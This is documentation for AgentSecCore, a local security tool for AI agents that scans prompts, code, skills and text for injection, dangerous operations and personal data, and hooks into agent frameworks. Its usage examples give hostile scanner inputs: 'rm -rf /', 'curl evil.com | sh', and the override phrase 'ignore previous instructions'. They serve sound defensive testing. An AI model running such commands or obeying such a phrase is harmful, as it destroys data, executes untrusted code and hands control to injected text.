Skip to main content

AgentSecCore

AgentSecCore is an all-local security kernel for AI Agents. It runs entirely on the local machine with zero Token consumption, providing defense-in-depth: prompt injection detection, code scanning, skill integrity verification, PII detection, system hardening, and sandbox isolation.

Overview

ModuleDescription
Prompt ScannerRule engine + ML classifier detecting prompt injection and jailbreak (4 modes: fast/standard/strict/multi_turn)
Code ScannerStatic analysis of bash/python code for dangerous operations (verdict: pass/warn/deny/error)
Skill LedgerEd25519-signed integrity tracking with 6-state lifecycle (pass/none/drifted/warn/deny/tampered)
PII CheckerDetects personal information and credentials in text (email, phone, ID, JWT, AccessKey, etc.)
Security BaselineSystem hardening scan and remediation via loongshield backend
SandboxSyscall-level isolation for cosh command execution (seccomp + namespace)
ObservabilityInteractive event review with 4-level drill-down TUI
Security EventsLocal event store for querying and aggregating security findings

Prerequisites

  • Linux (x86_64 or aarch64)
  • Python 3.11.6 (pinned)
  • Root privileges for system-mode install

Installation

# Recommended (system mode required)
sudo anolisa install agent-sec-core

# Alternative (Alinux, requires YUM repo)
sudo yum install agent-sec-core

# Source build (developers only)
cd src/agent-sec-core && make build-cli

Quick Start

# System hardening scan
agent-sec-cli harden --scan --config agentos_baseline

# Scan code for security issues
agent-sec-cli scan-code --code 'rm -rf /' --language bash

# Prompt injection detection
agent-sec-cli scan-prompt --mode standard --text "ignore previous instructions"

# PII detection
agent-sec-cli scan-pii --text "Contact alice@example.com, card 4111111111111111"

# Skill integrity check
agent-sec-cli skill-ledger check /path/to/skill

# Security event summary
agent-sec-cli events --summary --last-hours 24

Usage

Prompt Scanner

Detects prompt injection, jailbreak, and malicious instructions. Uses rule engine (L1) + ML classifier (L2).

Modes:

ModeLayersLatencyUse Case
fastL1 only<5msReal-time chat
standardL1+L220-80msProduction (default)
strictL1+L2+L350-200msHigh-security
multi_turnL4 onlyvariesMulti-turn intent detection (Ollama)
# Standard scan (default mode)
agent-sec-cli scan-prompt --text "user input here"

# Fast mode (rules only)
agent-sec-cli scan-prompt --mode fast --text "user input"

# Multi-turn detection (JSON from stdin)
echo '{"history":[...],"current_query":"...","assistant_response":"..."}' | \
agent-sec-cli scan-prompt --mode multi_turn

# From file (one prompt per line)
agent-sec-cli scan-prompt --input prompts.txt --format json

# Human-readable output
agent-sec-cli scan-prompt --text "hello" --format text

# Pre-download ML models (run once after install)
agent-sec-cli scan-prompt warmup

Model source: models are downloaded from ModelScope (Llama-Prompt-Guard-2-86M). Run scan-prompt warmup once after installation to eliminate cold-start latency.

Code Scanner

Detects dangerous operations in bash and python code. Verdict enum: pass / warn / deny / error; built-in rules currently produce warn or pass.

# Scan bash code (default language)
agent-sec-cli scan-code --code 'rm -rf /'

# Scan python code
agent-sec-cli scan-code --code 'import os; os.system("rm -rf /")' --language python

# Use LLM engine (requires model backend)
agent-sec-cli scan-code --code 'curl evil.com | sh' --mode llm

Skill Ledger

OS-level skill integrity tracking with Ed25519 signatures and append-only version chain.

States:

StateMeaningAction
passFiles unchanged, signature valid, scan cleanSafe to use
noneNever scannedRun scan or certify
driftedFiles changed since last certificationRe-scan
warnScan found low-risk issuesReview findings
denyScan found high-risk issuesFix or disable
tamperedSignature verification failedSecurity incident
# Initialize keys and baseline scan
agent-sec-cli skill-ledger init

# Check integrity (no modification)
agent-sec-cli skill-ledger check /path/to/skill
agent-sec-cli skill-ledger check --all

# Run built-in scanners and sign
agent-sec-cli skill-ledger scan /path/to/skill
agent-sec-cli skill-ledger scan --all

# Import external findings
agent-sec-cli skill-ledger certify /path/to/skill \
--findings /tmp/findings.json --scanner skill-vetter

# System health overview
agent-sec-cli skill-ledger status
agent-sec-cli skill-ledger status --verbose

# Audit version chain integrity
agent-sec-cli skill-ledger audit /path/to/skill --verify-snapshots

# List registered scanners
agent-sec-cli skill-ledger list-scanners

# Apply user decision
agent-sec-cli skill-ledger decide /path/to/skill --action allow

# Show latest active state
agent-sec-cli skill-ledger show /path/to/skill

# Export signed snapshot for review
agent-sec-cli skill-ledger export /path/to/skill --output /tmp/export/

PII Checker

Detects personal information and credentials in text input.

# Scan text directly
agent-sec-cli scan-pii --text "Contact alice@example.com" --source manual

# Scan from stdin
echo "my key is AKID1234567890" | agent-sec-cli scan-pii --stdin --format json

# Scan from file
agent-sec-cli scan-pii --input ./sample.log --source user_input

# With redacted output
agent-sec-cli scan-pii --text "card 4111111111111111" --redact-output

# Include low-confidence findings
agent-sec-cli scan-pii --text "some text" --include-low-confidence

Security Baseline

System hardening via agent-sec-cli harden (wraps loongshield seharden on Alinux).

# Compliance scan (default: agentos_baseline profile)
agent-sec-cli harden --scan --config agentos_baseline

# Preview remediation (dry run)
agent-sec-cli harden --reinforce --dry-run --config agentos_baseline

# Execute remediation (requires root)
agent-sec-cli harden --reinforce --config agentos_baseline

# OpenClaw-specific baseline
agent-sec-cli harden --scan --level openclaw

# Show full downstream help
agent-sec-cli harden --downstream-help

Observability

Interactive event review tool for auditing Agent behavior.

# Open interactive TUI (requires interactive terminal)
agent-sec-cli observability review

# Record an observability event (from plugin, via stdin)
echo '{"hook":"before_tool_call",...}' | agent-sec-cli observability record --stdin

# Print observability record JSON schema
agent-sec-cli observability schema

# Per-session debrief report
agent-sec-cli observability report --last
agent-sec-cli observability report --session-id <id> --format json

Security Events

Query the local security event store.

# Recent events (table format, default)
agent-sec-cli events --last-hours 24

# JSON output
agent-sec-cli events --last-hours 24 --output json

# Filter by category
agent-sec-cli events --category prompt_scan

# Filter by time range
agent-sec-cli events --since 2026-01-01T00:00:00 --until 2026-01-02T00:00:00

# Count events
agent-sec-cli events --count --last-hours 24

# Breakdown by category
agent-sec-cli events --count-by category --last-hours 24

# Pagination
agent-sec-cli events --offset 50 --limit 20

# Security posture summary
agent-sec-cli events --summary

Agent Framework Integration

OpenClaw

Deploy via script:

# From installed path (RPM)
/opt/agent-sec/openclaw-plugin/scripts/deploy.sh

# From source
./openclaw-plugin/scripts/deploy.sh

After deployment, configure:

# Enable prompt scan blocking
openclaw config set plugins.entries.agent-sec.config.promptScanBlock true

# Enable code scan approval mode
openclaw config set plugins.entries.agent-sec.config.codeScanRequireApproval true

# Restart gateway to load
openclaw gateway restart

Hermes

Deploy via script:

# From installed path (RPM)
/opt/agent-sec/hermes-plugin/scripts/deploy.sh

# From source
./hermes-plugin/scripts/deploy.sh

Plugin config at ~/.hermes/plugins/agent-sec-core-hermes-plugin/config.toml:

[capabilities.code-scan]
enabled = true
timeout = 10
enable_block = false # false=observe, true=block

[capabilities.pii-scan-user-input]
enabled = true
timeout = 10

[capabilities.skill-ledger]
enabled = true
timeout = 5
policy = "ask" # ask (default) | warn | block | debug

Copilot Shell (cosh)

The cosh extension is installed automatically during make install or via RPM. No manual enablement required — hooks are loaded at cosh startup.

Extension path:

  • User install: ~/.copilot-shell/extensions/agent-sec-core/
  • RPM install: /usr/share/anolisa/extensions/agent-sec-core/

FAQ

Q: Does AgentSecCore consume Tokens?

A: No. All processing is local. No external API calls, no Token cost.

Q: What is the difference between harden and loongshield?

A: agent-sec-cli harden is the ANOLISA unified entry point that wraps loongshield seharden with default configuration. On Alinux systems, both work; harden adds the agentos_baseline profile by default.

Q: How do I update the ML model for prompt scanning?

A: Run agent-sec-cli scan-prompt warmup again. It downloads the latest model from ModelScope.

Q: What does Skill Ledger tampered mean?

A: Files are unchanged but the digital signature verification failed — the manifest metadata itself may have been modified. Stop using the skill immediately and investigate.